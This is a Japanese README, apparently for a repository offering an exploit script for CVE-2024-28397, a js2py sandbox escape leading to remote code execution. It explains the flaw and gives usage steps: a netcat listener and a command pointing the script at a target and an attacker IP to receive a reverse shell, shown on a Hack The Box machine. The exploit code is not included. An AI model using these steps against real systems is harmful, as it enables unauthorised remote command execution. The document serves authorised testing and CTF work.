
**js2py Sandbox Escape** の脆弱性(CVE-2024-28397)を悪用するためのPython自動化スクリプトです。このツールは、脆弱なインスタンス上でリモートコード実行(RCE)を達成するためのペイロード生成・配信プロセスを自動化します。
js2py サンドボックスエスケープ の脆弱性(CVE-2024-28397)を悪用するための Python 自動化スクリプトです。このツールは、脆弱性のあるインスタンス上でリモートコード実行(RCE)を達成するためのペイロード生成および配信プロセスを自動化します。
⚠️ 法的免責事項 事前の相互同意なしに対象に攻撃を仕掛けるためにこのツールを使用することは違法です。このリポジトリは教育目的のみで提供されています。作者はこの情報の誤用について一切の責任を負いません。このツールは、権限が付与されたセキュリティ評価および Capture The Flag(CTF)環境での使用を意図しています。
CVE-2024-28397 は js2py ライブラリ(バージョン < 0.74)に影響を与えます。このライブラリは、JavaScript 環境をホストの Python 環境から適切に分離できません。
__class__ および __subclasses__ 属性へのアクセスが可能になります。subprocess.Popen にアクセスし、ホストサーバー上で任意のコマンドを実行することができます。pip install requests
Netcat リスナーを起動します:
nc -lvnp 1337
スクリプトを実行します:
python3 exploit.py -u <target url> -i <attacker ip> -p <attacker port>
以下は、脆弱性のあるターゲット(Hack The Box - CodeTwo)に対するツールの動作の様子です:
エクスプロイトを実行してペイロードを生成し、コールバックをトリガーします:

リスナーでリバースシェルを受信します:
